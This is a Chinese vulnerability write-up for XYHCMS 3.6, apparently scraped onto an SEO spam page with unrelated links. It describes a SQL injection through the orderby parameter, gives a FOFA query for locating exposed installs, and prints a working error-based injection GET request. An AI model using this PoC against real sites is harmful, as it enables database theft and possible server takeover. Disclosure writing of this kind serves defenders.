当前位置: 首页 > news >正文

站酷网页设计分析独立网站

站酷网页设计分析,独立网站,网站内移动的图片怎么做的,汕头市人民政府官网0x01 产品简介 行云海cms是完全开源的一套CMS内容管理系统,简洁,易用,安全,稳定,免费。 0x02 漏洞概述 行云海cms中ThinkPHP在处理order by排序时可利用key构造SQL语句进行注入,LtController.class.php中发现传入了orderby未进行过滤导致sql注入。攻击者除了可以利用 SQL 注入…

0x01 产品简介

 行云海cms是完全开源的一套CMS内容管理系统,简洁,易用,安全,稳定,免费。

0x02 漏洞概述

 行云海cms中ThinkPHP在处理order by排序时可利用key构造SQL语句进行注入,LtController.class.php中发现传入了orderby未进行过滤导致sql注入。攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 影响范围

 xyhcms 3.6版本

0x04 复现环境

FOFA:app="XYHCMS"

1f3ae77b60a24fd9926f11210ff9da08.png

0x05 漏洞复现

PoC

GET /index.php/Api/Lt/alist?orderby[updatexml(1,concat(0x3a,(select%20version()),0x3a),1);]=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

PS:PoC中报错注入的结果不会直接回显,但会写到日志里面,访问日志即可查看 

http://www.mnyf.cn/news/15402.html

相关文章:

  • 煤炭建设行业协会网站大连百度推广公司
  • 有没有专门做胜负彩的网站长清区seo网络优化软件
  • 电商网站开发主要设计内容东莞网络公司排行榜
  • 县区网站服务器机房建设百度seo排名优化联系方式
  • 莆田网站建设开发云南网络推广seo代理公司
  • 一些建筑设计网站郴州网站建设网络推广平台
  • 做tb任务赚钱的网站山东济南seo整站优化费用
  • 厦门专业做网站公司西地那非片的功效与作用
  • 信息发布关键词seo优化软件
  • 电子商务网站系统规划报告百度指数的作用
  • 多个网站能否统一做等保seo计费系统开发
  • 珠海做网站优化的公司关键词搜索排名软件
  • 论文引用网站怎样做脚注友情链接买卖平台
  • 网站解析域名深圳关键词优化怎么样
  • 网站备案完成通知友情链接交换形式有哪些
  • 清远公司网站建设关键词优化工具
  • 简单模板网站制作时间建设企业营销型网站
  • 痞子 wordpress草根seo视频大全网站
  • 网站设计特点seo排名优化教程
  • 做长老环的网站客户管理软件哪个好用
  • 使用亚马逊云做网站百度广告公司
  • 网站不能调用样式百度推广优化师培训
  • 做的网站如何全屏代码企业网站建站
  • 精通网站建设 全能建站密码pdf北京全网推广
  • 可以做网站的域名后缀市场营销推广方案
  • php做网站时间代码网页推广怎么做的
  • 武汉外贸网站推广价格游戏推广拉人渠道
  • 网站建设如何做用户名密码阐述网络推广的主要方法
  • 桓台网站分析影响网站排名的因素
  • 北京网站开发联系电话重庆网络推广公司